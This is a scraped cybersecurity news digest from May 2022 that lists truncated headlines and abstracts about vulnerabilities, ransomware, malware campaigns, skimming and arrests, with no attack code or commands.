Zyxel has released patches to address four security flaws affecting its firewall, AP Controller, and AP products that could be exploited to execute arbitrary operating system commands and steal select information. The list of security vulnerabilities is as follows:
- CVE-2022-0734 - A cross-site scripting (XSS) vulnerability in some firewall versions that could be exploited to access information stored in the user's browser, such as cookies or session tokens, via a malicious script.
- CVE-2022-26531 - Several input validation flaws in command line interface (CLI) commands for some versions of firewall, AP controller, and AP devices that could be exploited to cause a system crash.
- CVE-2022-26532 - A command injection vulnerability in the "packet-trace" CLI command for some versions of firewall, AP controller, and AP devices that could lead to execution of arbitrary OS commands.
- CVE-2022-0910 - An authentication bypass vulnerability affecting select firewall versions that could pThe Hacker News
May 27, 2022 – Vulnerabilities
Experts released PoC exploit code for critical VMware CVE-2022-22972 flaw Full Text
Abstract
Security researchers released PoC exploit code for the critical authentication bypass vulnerability CVE-2022-22972 affecting multiple VMware products. Horizon3 security researchers have released a proof-of-concept (PoC) exploit and technical analysis...Security Affairs
May 26, 2022 – Phishing
Intuit warns of QuickBooks phishing threatening to suspend accounts Full Text
Abstract
Tax software vendor Intuit has warned that QuickBooks customers are being targeted in an ongoing series of phishing attacks impersonating the company and trying to lure them with fake account suspension warnings.BleepingComputer
May 26, 2022 – Outage
Ransomware Attack Disrupts Multiple Civil Services in Somerset County Full Text
Abstract
The county had to create temporary Gmail accounts so that residents can contact “critical departments such as the County Commissioners, Health, Emergency Operations, the County Clerk, Sheriff, and Surrogate.”The Record
May 26, 2022 – Vulnerabilities
Critical ‘Pantsdown’ BMC Vulnerability Affects QCT Servers Used in Data Centers Full Text
Abstract
Quanta Cloud Technology (QCT) servers have been identified as vulnerable to the severe "Pantsdown" Baseboard Management Controller (BMC) flaw, according to new research published today. "An attacker running code on a vulnerable QCT server would be able to 'hop' from the server host to the BMC and move their attacks to the server management network, possibly continue and obtain further permissions to other BMCs on the network and by doing that gaining access to other servers," firmware and hardware security firm Eclypsium said. A baseboard management controller is a specialized system used for remote monitoring and management of servers, including controlling low-level hardware settings as well as installing firmware and software updates. Tracked as CVE-2019-6260 (CVSS score: 9.8), the critical security flaw came to light in January 2019 and relates to a case of arbitrary read and write access to the BMC's physical address space, resulting in aThe Hacker News
May 26, 2022 – Phishing
Exposed: the threat actors who are poisoning Facebook Full Text
Abstract
An investigation of the infamous “Is That You?” video scam led Cybernews researchers into exposing threat actors who are poisoning Facebook. Original post @ https://cybernews.com/security/exposed-the-threat-actors-who-are-poisoning-facebook/ An...Security Affairs
May 26, 2022 – Vulnerabilities
Windows 11 KB5014019 breaks Trend Micro ransomware protection Full Text
Abstract
This week's Windows optional cumulative update previews have introduced a compatibility issue with some of Trend Micro's security products that breaks some of their capabilities, including the ransomware protection feature.BleepingComputer
May 26, 2022 – Ransomware
New Chaos and Nokoyawa Ransomware Variants Found Full Text
Abstract
Security analysts spotted two new ransomware variants for Nokoyawa and Chaos ransomware, in two separate reports. Chaos' variant named Yashma includes two new improvements: the ability to stop execution on the basis of a victim's location and stop different running processes linked with antivirus a ...Cyware Alerts - Hacker News
May 26, 2022 – Malware
Experts Warn of Rise in ChromeLoader Malware Hijacking Users’ Browsers Full Text
Abstract
A malvertising threat is witnessing a new surge in activity since its emergence earlier this year. Dubbed ChromeLoader, the malware is a "pervasive and persistent browser hijacker that modifies its victims' browser settings and redirects user traffic to advertisement websites," Aedan Russell of Red Canary said in a new report. ChromeLoader is a rogue Chrome browser extension and is typically distributed in the form of ISO files via pay-per-install sites and baited social media posts that advertise QR codes to cracked video games and pirated movies. While it primarily functions by hijacking user search queries to Google, Yahoo, and Bing and redirecting traffic to an advertising site, it's also notable for its use of PowerShell to inject itself into the browser and get the extension added. The malware, also known as Choziosi Loader, was first documented by G DATA earlier this February. "For now the only purpose is getting revenue via unsolicited advertiThe Hacker News
May 26, 2022 – Vulnerabilities
Zyxel addresses four flaws affecting APs, AP controllers, and firewalls Full Text
Abstract
Zyxel addressed multiple vulnerabilities impacting many of its products, including APs, AP controllers, and firewalls. Zyxel has released security updates to address multiple vulnerabilities affecting multiple products, including firewall, AP, and AP controller...Security Affairs
May 26, 2022 – Vulnerabilities
OAS platform vulnerable to critical RCE and API access flaws Full Text
Abstract
Threat analysts have disclosed vulnerabilities affecting the Open Automation Software (OAS) platform, leading to device access, denial of service, and remote code execution.BleepingComputer
May 26, 2022 – Skimming
Credit Card Stealers Adopt Advanced Evasion Techniques Full Text
Abstract
Microsoft found that scammers are using image files with a hidden malicious PHP script to manipulate e-commerce checkout pages and capture payment card details in their latest attack campaigns. The attackers are obfuscating their code snippets, injecting them into image files, and masquerading as w ...Cyware Alerts - Hacker News
May 26, 2022 – Hacker
Hackers Increasingly Using Browser Automation Frameworks for Malicious Activities Full Text
Abstract
Cybersecurity researchers are calling attention to a free-to-use browser automation framework that's being increasingly used by threat actors as part of their attack campaigns. "The framework contains numerous features which we assess may be utilized in the enablement of malicious activities," researchers from Team Cymru said in a new report published Wednesday. "The technical entry bar for the framework is purposefully kept low, which has served to create an active community of content developers and contributors, with actors in the underground economy advertising their time for the creation of bespoke tooling." The U.S. cybersecurity company said it observed command-and-control (C2) IP addresses associated with malware such as Bumblebee, BlackGuard, and RedLine Stealer establishing connections to the downloads subdomain of Bablosoft ("downloads.bablosoft[.]com"), the maker of the Browser Automation Studio (BAS). Bablosoft was previouslyThe Hacker News
May 26, 2022 – Attack
Experts warn of a new malvertising campaign spreading the ChromeLoader Full Text
Abstract
Researchers warn of a new malvertising campaign spreading the ChromeLoader malware that hijacks the victims' browsers. Researchers from Red Canary observed a new malvertising campaign spreading the ChromeLoader malware that hijacks the victims' browsers. ChromeLoader...Security Affairs
May 26, 2022 – Vulnerabilities
Exploit released for critical VMware auth bypass bug, patch now Full Text
Abstract
Proof-of-concept exploit code is now available online for a critical authentication bypass vulnerability in multiple VMware products that allows attackers to gain admin privileges.BleepingComputer
May 26, 2022 – Vulnerabilities
Quanta Servers Caught With ‘Pantsdown’ BMC Vulnerability Full Text
Abstract
Several Quanta Cloud Technology (QCT) server models are vulnerable to a critical firmware vulnerability that puts them at risk of attacks that take full control over the server — and that can spread across numerous servers on the same network.Dark Reading
May 26, 2022 – Vulnerabilities
The Added Dangers Privileged Accounts Pose to Your Active Directory Full Text
Abstract
In any organization, there are certain accounts that are designated as being privileged. These privileged accounts differ from standard user accounts in that they have permission to perform actions that go beyond what standard users can do. The actions vary based on the nature of the account but can include anything from setting up new user accounts to shutting down mission-critical systems. Privileged accounts are essential tools. Without these accounts, the IT staff would be unable to do its job. At the same time, privileged accounts can pose a serious threat to an organization's security.
Added risk of a privileged account
Imagine for a moment that a hacker manages to steal a standard user's password and is able to log in as that user. Even though the hacker would have access to certain resources at that point, they would be constrained by the user's privileges (or lack thereof). In other words, the hacker would be able to browse the Internet, open some applications, and accessThe Hacker News
May 26, 2022 – Vulnerabilities
Do not use Tails OS until a flaw in the bundled Tor Browser will be fixed Full Text
Abstract
The maintainers of the Tails project (The Amnesic Incognito Live System) warn users that the Tor Browser bundled with the OS could expose their sensitive information. The maintainers confirmed that Tor Browser in Tails 5.0 and earlier is unsafe...Security Affairs
May 26, 2022 – Attack
Microsoft shares mitigation for Windows KrbRelayUp LPE attacks Full Text
Abstract
Microsoft has shared guidance to help admins defend their Windows enterprise environments against KrbRelayUp attacks that enable attackers to gain SYSTEM privileges on Windows systems with default configurations.BleepingComputer
May 26, 2022 – Business
Broadcom announces plans to buy VMware in $61 billion deal Full Text
Abstract
Broadcom will buy VMware in a cash-and-stock transaction valued at $61 billion, based on the closing price of Broadcom common stock on May 25, 2022, the companies announced Thursday.CNBC
May 26, 2022 – Vulnerabilities
Tails OS Users Advised Not to Use Tor Browser Until Critical Firefox Bugs are Patched Full Text
Abstract
The maintainers of the Tails project have issued a warning that the Tor Browser that's bundled with the operating system is unsafe to use for accessing or entering sensitive information. "We recommend that you stop using Tails until the release of 5.1 (May 31) if you use Tor Browser for sensitive information (passwords, private messages, personal information, etc.)," the project said in an advisory issued this week. Tails, short for The Amnesic Incognito Live System, is a security-oriented Debian-based Linux distribution aimed at preserving privacy and anonymity by connecting to the internet through the Tor network. The alert comes as Mozilla on May 20, 2022 rolled out fixes for two critical zero-day flaws in its Firefox browser, a modified version of which acts as the foundation of the Tor Browser. Tracked as CVE-2022-1802 and CVE-2022-1529, the two vulnerabilities are what's referred to as prototype pollution that could be weaponized to gain JavaScript cThe Hacker News
May 26, 2022 – Government
Italy announced its National Cybersecurity Strategy 2022/26 Full Text
Abstract
Italy announced its National Cybersecurity Strategy for 2022/26, a crucial document to address cyber threats and increase the resilience of the country. Italy presented its National Cybersecurity Strategy for 2022/26 to reinforce the government's...Security Affairs
May 26, 2022 – Vulnerabilities
Zyxel warns of flaws impacting firewalls, APs, and controllers Full Text
Abstract
Zyxel has published a security advisory to warn admins about multiple vulnerabilities affecting a wide range of firewall, AP, and AP controller products.BleepingComputer
May 26, 2022 – Breach
Update: Conti leaks data stolen during January attack on Oregon county Full Text
Abstract
Darrin Lane, administrative officer for Linn County, told The Record that the attack began on the morning of January 24 and that the county’s IT team immediately began shutting down systems in order to limit the damage.The Record
May 26, 2022 – Policy and Law
Twitter Fined $150 Million for Misusing Users’ Data for Advertising Without Consent Full Text
Abstract
Twitter, which is in the process of being acquired by Tesla CEO Elon Musk, has agreed to pay $150 million to the U.S. Federal Trade Commission (FTC) to settle allegations that it abused non-public information collected for security purposes to serve targeted ads. In addition to the monetary penalty for "misrepresenting its privacy and security practices," the company has been banned from profiting from the deceptively collected data and ordered to notify all affected users. "Twitter obtained data from users on the pretext of harnessing it for security purposes but then ended up also using the data to target users with ads," FTC Chair Lina M. Khan said in a statement. "This practice affected more than 140 million Twitter users, while boosting Twitter's primary source of revenue." According to a complaint filed by the U.S. Justice Department, Twitter in May 2013 began enforcing a requirement for users to provide either a phone number or email adThe Hacker News
May 26, 2022 – General
Industrial Spy data extortion market gets into the ransomware game Full Text
Abstract
The Industrial Spy data extortion marketplace has now launched its own ransomware operation, where they now also encrypt victims' devices.BleepingComputer
May 26, 2022 – Malware
New ERMAC 2.0 Android malware steals accounts, wallets from 467 apps Full Text
Abstract
The ERMAC Android banking trojan has released version 2.0, increasing the number of applications targeted from 378 to 467, covering a much wider range of apps to steal account credentials and crypto wallets.BleepingComputer
May 25, 2022 – Ransomware
New ‘Cheers’ Linux ransomware targets VMware ESXi servers Full Text
Abstract
A new ransomware named 'Cheers' has appeared in the cybercrime space and has started its operations by targeting vulnerable VMware ESXi servers.BleepingComputer
May 25, 2022 – Vulnerabilities
Vulnerabilities in Open Automation Software Platform could lead to information disclosure, denial of service Full Text
Abstract
Cisco Talos discovered eight vulnerabilities that could allow an adversary to carry out a variety of malicious actions, including improperly authenticating into the targeted device and causing a denial of service.Cisco Talos
May 25, 2022 – Criminals
Interpol Arrest Leader of SilverTerrier Cybercrime Gang Behind BEC Attacks Full Text
Abstract
A year-long international investigation has resulted in the arrest of the suspected head of the SilverTerrier cybercrime group by the Nigeria Police Force. "The suspect is alleged to have run a transnational cybercrime syndicate that launched mass phishing campaigns and business email compromise schemes targeting companies and individual victims," Interpol said in a statement. Operation Delilah, as the coordinated international effort is called, involved tracking the 37-year-old Nigerian man's physical movements, before he was apprehended at Murtala Mohammed International Airport in Lagos. Singapore-headquartered cybersecurity company Group-IB said it provided threat intelligence that led to the arrest as part of the police operation that commenced in May 2021. The development is the third in a series of law enforcement actions aimed at the identification and arrest of the suspected members of the SilverTerrier gang (aka TMT). In November 2020, three alleged mThe Hacker News
May 25, 2022 – Malware
New ChromeLoader malware surge threatens browsers worldwide Full Text
Abstract
The ChromeLoader malware is seeing an uptick in detections this month, following a relatively stable operation volume since the start of the year, which means that the malvertiser is now becoming a widespread threat.BleepingComputer
May 25, 2022 – Breach
Washington University School of Medicine notifies patients of data breach Full Text
Abstract
According to the Washington University School of Medicine's website, the health system learned that an unauthorized person gained access to certain employee email accounts between March 4 and March 28.Becker’s Health IT Review
May 25, 2022 – Privacy
Lumos System Can Find Hidden Cameras and IoT Devices in Your Airbnb or Hotel Room Full Text
Abstract
A group of academics has devised a system that can be used on a phone or a laptop to identify and locate Wi-Fi-connected hidden IoT devices in unfamiliar physical spaces. With hidden cameras being increasingly used to snoop on individuals in hotel rooms and Airbnbs, the goal is to be able to pinpoint such rogue devices without much of a hassle. The system, dubbed Lumos, is designed with this intent in mind and to "visualize their presence using an augmented reality interface," said Rahul Anand Sharma, Elahe Soltanaghaei, Anthony Rowe, and Vyas Sekar of Carnegie Mellon University in a new paper. At its core, the platform works by sniffing and collecting encrypted wireless packets over the air to detect and identify concealed devices. Subsequently, it estimates the location of each identified device with respect to the user as they walk around the perimeter of the space. The localization module, for its part, combines signal strength measurements that are availThe Hacker News
May 25, 2022 – Vulnerabilities
Tails 5.0 Linux users warned against using it “for sensitive information” Full Text
Abstract
Tails developers have warned users to stop using the portable Debian-based Linux distro until the next release if they're entering or accessing sensitive information using the bundled Tor Browser application.BleepingComputer
May 25, 2022 – Malware
Windows Exploits Used to Target Infosec Community Full Text
Abstract
Cyble researchers spotted a malware campaign targeting the infosec community via fake PoC exploit code for an RPC Runtime RCE flaw. The fake exploit was distributed via GitHub. By attacking the infosec community, attackers are probably trying to gain access to vulnerability research or steal other p ...Cyware Alerts - Hacker News
May 25, 2022 – Education
How Secrets Lurking in Source Code Lead to Major Breaches Full Text
Abstract
If one word could sum up the 2021 infosecurity year (well, actually three), it would be these: "supply chain attack". A software supply chain attack happens when hackers manipulate the code in third-party software components to compromise the 'downstream' applications that use them. In 2021, we have seen a dramatic rise in such attacks: high-profile security incidents like the SolarWinds, Kaseya, and Codecov data breaches have shaken enterprises' confidence in the security practices of third-party service providers. What does this have to do with secrets, you might ask? In short, a lot. Take the Codecov case (we'll go back to it quickly): it is a textbook example to illustrate how hackers leverage hardcoded credentials to gain initial access into their victims' systems and harvest more secrets down the chain. Secrets-in-code remains one of the most overlooked vulnerabilities in the application security space, despite being a priority target in hackThe Hacker News
May 25, 2022 – Criminals
Darknet market Versus shuts down after hacker leaks security flaw Full Text
Abstract
The Versus Market, one of the most popular English-speaking criminal darknet markets, is shutting down after discovering a severe exploit that could have allowed access to its database and exposed the IP address of its servers.BleepingComputer
May 25, 2022 – Ransomware
New Linux-Based Ransomware ‘Cheerscrypt’ Targets VMware ESXi Servers Full Text
Abstract
In the past, ESXi servers were also attacked by other known ransomware families such as LockBit, Hive, and RansomEXX as an efficient way to infect many computers with ransomware.Trend Micro
May 25, 2022 – Education
Learn How Hackers Can Hijack Your Online Accounts Even Before You Create Them Full Text
Abstract
Malicious actors can gain unauthorized access to users' online accounts via a new technique called "account pre-hijacking," new research has found. The attack takes aim at the account creation process that's ubiquitous in websites and other online platforms, enabling an adversary to perform a set of actions before an unsuspecting victim creates an account in a target service. The study was led by independent security researcher Avinash Sudhodanan in collaboration with Andrew Paverd of the Microsoft Security Response Center (MSRC). Pre-hijacking banks on the prerequisite that an attacker is already in possession of a unique identifier associated with a victim, such as an email address or phone number, which can be obtained either from the target's social media accounts or credential dumps circulating on the web. The attacks can then play out in five different ways, including the use of the same email address during account creation by both the adversary and tThe Hacker News
May 25, 2022 – General
Is 100% Cybersecurity Readiness Possible? Medical Device Pros Weigh In Full Text
Abstract
As medical devices become more connected and reliant on software, their codebase grows both in size and complexity, and they are increasingly reliant on third-party and open source software components. Learn more from 150 senior decision makers who oversee product security or cybersecurity compliance in the medical device industry,BleepingComputer
May 25, 2022 – Denial Of Service
Pro-Iran Group ALtahrea Hits Port of London Website by DDoS Attack Full Text
Abstract
The Port of London Authority/PLA has become the latest victim of a cyberattack that caused the forced shut down of its website, the company confirmed on Tuesday, May 24th.Hackread
May 25, 2022 – Attack
Researchers Find New Malware Attacks Targeting Russian Government Entities Full Text
Abstract
An unknown advanced persistent threat (APT) group has been linked to a series of spear-phishing attacks targeting Russian government entities since the onset of the Russo-Ukrainian war in late February 2022. "The campaigns [...] are designed to implant a Remote Access Trojan (RAT) that can be used to surveil the computers it infects, and run commands on them remotely," Malwarebytes said in a technical report published Tuesday. The cybersecurity company attributed the attacks with low confidence to a Chinese hacking group, citing infrastructure overlaps between the RAT and Sakula Rat malware used by a threat actor known as Deep Panda . The attack chains, while leveraging different lures over the course of two months, all employed the same malware barring small differences in the source code. The campaign is said to have commenced around February 26, days after Russia's military invasion of Ukraine, with the emails distributing the RAT under the guise of an interacThe Hacker News
May 25, 2022 – Hacker
Hacker says hijacking libraries, stealing AWS keys was ethical research Full Text
Abstract
The hacker of 'ctx' and 'PHPass' libraries has now broken silence and explained the reasons behind this hijack to BleepingComputer. According to the hacker, this was a bug bounty exercise and no malicious activity was intended.BleepingComputer
May 25, 2022 – Vulnerabilities
Chrome 102 Patches 32 Vulnerabilities Full Text
Abstract
The critical security hole, tracked as CVE-2022-1853, has been described as a use-after-free bug affecting Indexed DB. Google learned about it on May 12 and it has yet to determine the bug bounty for this vulnerability.Security Week
May 25, 2022 – General
[Template] Incident Response for Management Presentation Full Text
Abstract
Security incidents occur. It's not a matter of "if," but of "when." That's why you implemented security products and procedures to optimize the incident response (IR) process. However, many security pros who are doing an excellent job in handling incidents find effectively communicating the ongoing process to their management a much more challenging task. Sound familiar? In many organizations, leadership is not security savvy, and they aren't interested in the details regarding all the bits and bytes that the security pro masters. Luckily, there is a template that security leads can use when presenting to management. It's called the IR Reporting for Management template, providing CISOs and CIOs with a clear and intuitive tool to report both the ongoing IR process and its conclusion. The IR Reporting for Management template enables CISOs and CIOs to communicate the two key points that management cares about—assurance that the incidThe Hacker News
May 25, 2022 – Policy and Law
Interpol arrests alleged leader of the SilverTerrier BEC gang Full Text
Abstract
After a year-long investigation that involved Interpol and several cybersecurity companies, the Nigeria Police Force has arrested an individual believed to be in the top ranks of a prominent business email compromise (BEC) group known as SilverTerrier or TMT.BleepingComputer
May 25, 2022 – Malware
Credit Card Stealer Targets PsiGate Payment Gateway Software Full Text
Abstract
The malware injection leverages the #psigate_cc_number, #psigate_expiration, #psigate_expiration_yr and #psigate_cc_cid fields (among others) to harvest customer’s payment data and details whenever the text fields are submitted on the checkout page.Sucuri
May 25, 2022 – Attack
SpiceJet airline passengers stranded after ransomware attack Full Text
Abstract
Indian low-cost airline SpiceJet has informed its customers of an attempted ransomware attack that has impacted some of its systems and caused delays on flight departures today.BleepingComputer
May 25, 2022 – Malware
BPFDoor malware uses Solaris vulnerability to get root privileges Full Text
Abstract
New research into the inner workings of the stealthy BPFdoor malware for Linux and Solaris reveals that the threat actor behind it leveraged an old vulnerability to achieve persistence on targeted systems.BleepingComputer
May 25, 2022 – APT
Unknown APT group is targeting Russian government entities Full Text
Abstract
An unknown APT group is targeting Russian government entities since the beginning of the Russian invasion of Ukraine. Researchers from Malwarebytes observed an unknown Advanced Persistent Threat (APT) group targeting Russian government entities with...Security Affairs
May 25, 2022 – Ransomware
Link Found Connecting Chaos, Onyx and Yashma Ransomware Full Text
Abstract
A slip-up by a malware author has allowed researchers to taxonomize three ransomware variations going by different names.Threatpost
May 25, 2022 – Criminals
International police operation led to the arrest of the SilverTerrier gang leader Full Text
Abstract
The Nigeria Police Force has arrested the suspected leader of the SilverTerrier cybercrime group as a result of an international operation. The Nigeria Police Force has arrested the suspected leader of the SilverTerrier cybercrime gang (aka TMT) after...Security Affairs
May 25, 2022 – Vulnerabilities
Zoom Patches ‘Zero-Click’ RCE Bug Full Text
Abstract
The Google Project Zero researcher found a bug in XML parsing on the Zoom client and server.Threatpost
May 25, 2022 – Vulnerabilities
Chaining Zoom bugs is possible to hack users in a chat by sending them a message Full Text
Abstract
Security flaws in Zoom can be exploited to compromise another user over chat by sending specially crafted messages. A set of four security flaws in the popular video conferencing service Zoom could be exploited to compromise another user over chat...Security Affairs
May 25, 2022 – General
Verizon Report: Ransomware, Human Error Among Top Security Risks Full Text
Abstract
2022’s DBIR also highlighted the far-reaching impact of supply-chain breaches and how organizations and their employees are the reasons why incidents occur.Threatpost
May 25, 2022 – Government
CISA adds 41 flaws to its Known Exploited Vulnerabilities Catalog Full Text
Abstract
The US Cybersecurity & Infrastructure Security Agency (CISA) adds 41 new vulnerabilities to its Known Exploited Vulnerabilities Catalog. The Cybersecurity & Infrastructure Security Agency (CISA) has added 41 flaws to its Known Exploited Vulnerabilities Catalog,...Security Affairs
May 24, 2022 – Privacy
DuckDuckGo browser allows Microsoft trackers due to search agreement Full Text
Abstract
The privacy-focused DuckDuckGo browser purposely allows Microsoft trackers on third-party sites due to an agreement in their syndicated search content contract between the two companies.BleepingComputer
May 24, 2022 – APT
Twisted Panda: Chinese APT Targets Russian Orgs Full Text
Abstract
The targeted attack, dubbed Twisted Panda, has been going on since at least June 2021 and spied on at least two Russian defense research institutes and another unknown target in Belarus.Cyware Alerts - Hacker News
May 24, 2022 – Breach
Popular PyPI Package ‘ctx’ and PHP Library ‘phpass’ Hijacked to Steal AWS Keys Full Text
Abstract
Two trojanized Python and PHP packages have been uncovered in what's yet another instance of a software supply chain attack targeting the open source ecosystem. One of the packages in question is "ctx," a Python module available in the PyPi repository. The other involves "phpass," a PHP package that's been forked on GitHub to distribute a rogue update. "In both cases the attacker appears to have taken over packages that have not been updated in a while," the SANS Internet Storm Center (ISC) said, one of whose volunteer incident handlers, Yee Ching, analyzed the ctx package. It's worth noting that ctx was last published to PyPi on December 19, 2014. On the other hand, phpass hasn't received an update since it was uploaded to Packagist on August 31, 2012. The malicious Python package, which was pushed to PyPi on May 21, 2022, has been removed from the repository, but the PHP library still continues to be available on GitHub. In bThe Hacker News
May 24, 2022 – Vulnerabilities
Trend Micro addressed a flaw exploited by China-linked Moshen Dragon APT Full Text
Abstract
Trend Micro addressed a DLL hijacking issue in Trend Micro Security actively exploited by a China-linked threat group to deploy malware. Trend Micro addressed a DLL hijacking flaw in Trend Micro Security that a China-linked threat actor actively exploited...Security Affairs
May 24, 2022 – Vulnerabilities
Mozilla fixes Firefox, Thunderbird zero-days exploited at Pwn2Own Full Text
Abstract
Mozilla has released security updates for multiple products to address zero-day vulnerabilities exploited during the Pwn2Own Vancouver 2022 hacking contest.BleepingComputer
May 24, 2022 – Vulnerabilities
Corrupted PyPI Package Opens Backdoors for Different OSes Full Text
Abstract
Sonatype warns developers against malicious packages in the PyPI registry that were rooted by cybercriminals to perform supply chain attacks by deploying Cobalt Strike beacons and backdoors on Windows, macOS, and Linux systems. It could provide hackers initial access to the developer's network for ...Cyware Alerts - Hacker News
May 24, 2022 – Solution
SIM-based Authentication Aims to Transform Device Binding Security to End Phishing Full Text
Abstract
Let's face it: we all use email, and we all use passwords. Passwords create inherent vulnerability in the system. The success rate of phishing attacks is skyrocketing, and opportunities for the attack have greatly multiplied as lives moved online. All it takes is one password to be compromised for all other users to become victims of a data breach. To deliver additional security, therefore, digital identities rely on verification plasters. MFA (multi-factor authentication) often falls back to knowledge factors such as password resets and OTP codes, but these are still vulnerable. As long as credentials can be shared or intercepted, they can be misused. What is needed is a paradigm shift – from knowledge-based credentials to strong possession-factor security that can't be compromised, alongside other verification security such as biometrics. A new possession-factor API now aims to do precisely that, replacing knowledge-based credentials, by using the SIM card for possessThe Hacker News
May 24, 2022 – Skimming
Microsoft warns of new highly evasive web skimming campaigns Full Text
Abstract
Threat actors behind web skimming campaigns are using malicious JavaScript to mimic Google Analytics and Meta Pixel scripts to avoid detection. Microsoft security researchers recently observed web skimming campaigns that used multiple obfuscation...Security Affairs
May 24, 2022 – Attack
Hackers target Russian govt with fake Windows updates pushing RATs Full Text
Abstract
Hackers are targeting Russian government agencies with phishing emails that pretend to be Windows security updates and other lures to install remote access malware.BleepingComputer
May 24, 2022 – Malware
Nation-state malware could become a commodity on dark web soon, Interpol warns Full Text
Abstract
In the ongoing conflict between Russia and Ukraine, the malware developed by both nation-state actors and non state actors represents a serious risk for critical infrastructure and organizations worldwide.Security Affairs
May 24, 2022 – Ransomware
New Chaos Ransomware Builder Variant “Yashma” Discovered in the Wild Full Text
Abstract
Cybersecurity researchers have disclosed details of the latest version of the Chaos ransomware line, dubbed Yashma. "Though Chaos ransomware builder has only been in the wild for a year, Yashma claims to be the sixth version (v6.0) of this malware," BlackBerry research and intelligence team said in a report shared with The Hacker News. Chaos is a customizable ransomware builder that emerged in underground forums on June 9, 2021, by falsely marketing itself as the .NET version of Ryuk despite sharing no such overlaps with the notorious counterpart. The fact that it's offered for sale also means that any malicious actor can purchase the builder and develop their own ransomware strains, turning it into a potent threat. It has since undergone five successive iterations aimed at improving its functionalities: version 2.0 on June 17, version 3.0 on July 5, version 4.0 on August 5, and version 5.0 in early 2022. While the first three variants of Chaos functioned more lThe Hacker News
May 24, 2022 – General
Nation-state malware could become a commodity on dark web soon, Interpol warns Full Text
Abstract
Interpol Secretary warns that nation-state malware will become available on the cybercrime underground in a couple of years. Interpol Secretary General Jurgen Stock declared that nation-state malware will become available on the darknet in a couple...Security Affairs
May 24, 2022 – Malware
Microsoft: Credit card stealers are getting much stealthier Full Text
Abstract
Microsoft's security researchers have observed a worrying trend in credit card skimming, where threat actors employ more advanced techniques to hide their malicious info-stealing code.BleepingComputer
May 24, 2022 – General
How confident are CISOs about their security posture? Full Text
Abstract
According to a new report by Proofpoint, many CISOs now feel much more in control of their environment. 48% feel that their organization is at risk of suffering a material cyber attack in the next 12 months, down from 64% last year.Help Net Security
May 24, 2022 – Malware
Malware Analysis: Trickbot Full Text
Abstract
In this day and age, we are not dealing with roughly pieced together, homebrew types of viruses anymore. Malware is an industry, and professional developers are found to exchange code, be it by stealing one another's code or through deliberate collaboration. Attacks are multi-layered these days, with diverse sophisticated software apps taking over different jobs along the attack chain, from initial compromise to ultimate data exfiltration or encryption. The specific tools for each stage are highly specialized and can often be rented as a service, including customer support and subscription models for professional (ab)use. Obviously, this has greatly increased both the availability and the potential effectiveness and impact of malware. Sound scary? Well, it does, but the apparent professionalization actually does have some good sides too. One factor is that certain reused modules commonly found in malware can be used to identify, track, and analyze professional attack software. Ultimately this means thatThe Hacker News
May 24, 2022 – Government
CISA adds 41 vulnerabilities to list of bugs used in cyberattacks Full Text
Abstract
The Cybersecurity & Infrastructure Security Agency (CISA) has added 41 vulnerabilities to its catalog of known exploited flaws over the past two days, including flaws for the Android kernel and Cisco IOS XR.BleepingComputer
May 24, 2022 – APT
Unknown APT group has targeted Russia repeatedly since Ukraine invasion Full Text
Abstract
An unknown Advanced Persistent Threat (APT) group has targeted Russian government entities through at least four separate spear-phishing campaigns since late February 2022.Malwarebytes Labs
May 24, 2022 – Criminals
Conti Ransomware Operation Shut Down After Splitting into Smaller Groups Full Text
Abstract
Even as the operators of Conti threatened to overthrow the Costa Rican government, the notorious cybercrime gang officially took down their infrastructure in favor of migrating their criminal activities to other ancillary operations, including Karakurt and BlackByte. "From the negotiations site, chatrooms, messengers to servers and proxy hosts - the Conti brand, not the organization itself, is shutting down," AdvIntel researchers Yelisey Boguslavskiy and Vitali Kremez said in a report. "However, this does not mean that the threat actors themselves are retiring." The voluntary termination, with the exception of its name-and-shame blog, is said to have occurred on May 19, 2022, while an organizational rejig was happening simultaneously to ensure a smooth transition of the ransomware group's members. AdvIntel said Conti, which is also tracked under the moniker Gold Ulrick, orchestrated its own demise by utilizing information warfare techniques. The disbThe Hacker News
May 24, 2022 – Government
US Senate: Govt’s ransomware fight hindered by limited reporting Full Text
Abstract
A report published today by U.S. Senator Gary Peters, Chairman of the Senate Homeland Security and Governmental Affairs Committee, says law enforcement and regulatory agencies lack insight into ransomware attacks to fight against them effectively.BleepingComputer
May 24, 2022 – General
Paying the ransom is not a good recovery strategy Full Text
Abstract
Businesses are losing the battle when it comes to defending against ransomware attacks, according to a Veeam report, which found that 72% of organizations had partial or complete attacks on their backup repositories.Help Net Security
May 24, 2022 – Criminals
Microsoft Warns of Web Skimmers Mimicking Google Analytics and Meta Pixel Code Full Text
Abstract
Threat actors behind web skimming campaigns are leveraging malicious JavaScript code that mimics Google Analytics and Meta Pixel scripts in an attempt to sidestep detection. "It's a shift from earlier tactics where attackers conspicuously injected malicious scripts into e-commerce platforms and content management systems (CMSs) via vulnerability exploitation, making this threat highly evasive to traditional security solutions," Microsoft 365 Defender Research Team said in a new report. Skimming attacks, such as those by Magecart, are carried out with the goal of harvesting and exporting users' payment information, such as credit card details, entered into online payment forms in e-commerce platforms, typically during the checkout process. This is achieved by taking advantage of security vulnerabilities in third-party plugins and other tools to inject rogue JavaScript code into the online portals without the owners' knowledge. As skimming attacks have increThe Hacker News
May 24, 2022 – Vulnerabilities
Screencastify Chrome extension flaws allow webcam hijacks Full Text
Abstract
The popular Screencastify Chrome extension has fixed a vulnerability that allowed malicious sites to hijack users' webcams and steal recorded videos. However, security flaws still exist that could be exploited by unscrupulous insiders.BleepingComputer
May 24, 2022 – Breach
Hackers Breach Zola Wedding Registry Accounts and Make Fraudulent Purchases Full Text
Abstract
The popular wedding planning website Zola confirmed Monday that hackers had managed to access the accounts of a number of its users and tried to initiate fraudulent cash transfers.The Verge
May 24, 2022 – Vulnerabilities
Trend Micro fixes bug Chinese hackers exploited for espionage Full Text
Abstract
Trend Micro says it patched a DLL hijacking flaw in Trend Micro Security used by a Chinese threat group to side-load malicious DLLs and deploy malware.BleepingComputer
May 24, 2022 – General
Vishing cases reach all time high Full Text
Abstract
Vishing (voice phishing) cases have increased almost 550 percent over the last twelve months (Q1 2022 to Q1 2021), according to the latest Quarterly Threat Trends & Intelligence Report from Agari and PhishLabs.Help Net Security
May 24, 2022 – Vulnerabilities
Researchers to release exploit for new VMware auth bypass, patch now Full Text
Abstract
Proof-of-concept exploit code is about to be published for a vulnerability that allows administrative access without authentication in several VMware products.BleepingComputer
May 24, 2022 – Breach
Popular Python and PHP libraries hijacked to steal AWS keys Full Text
Abstract
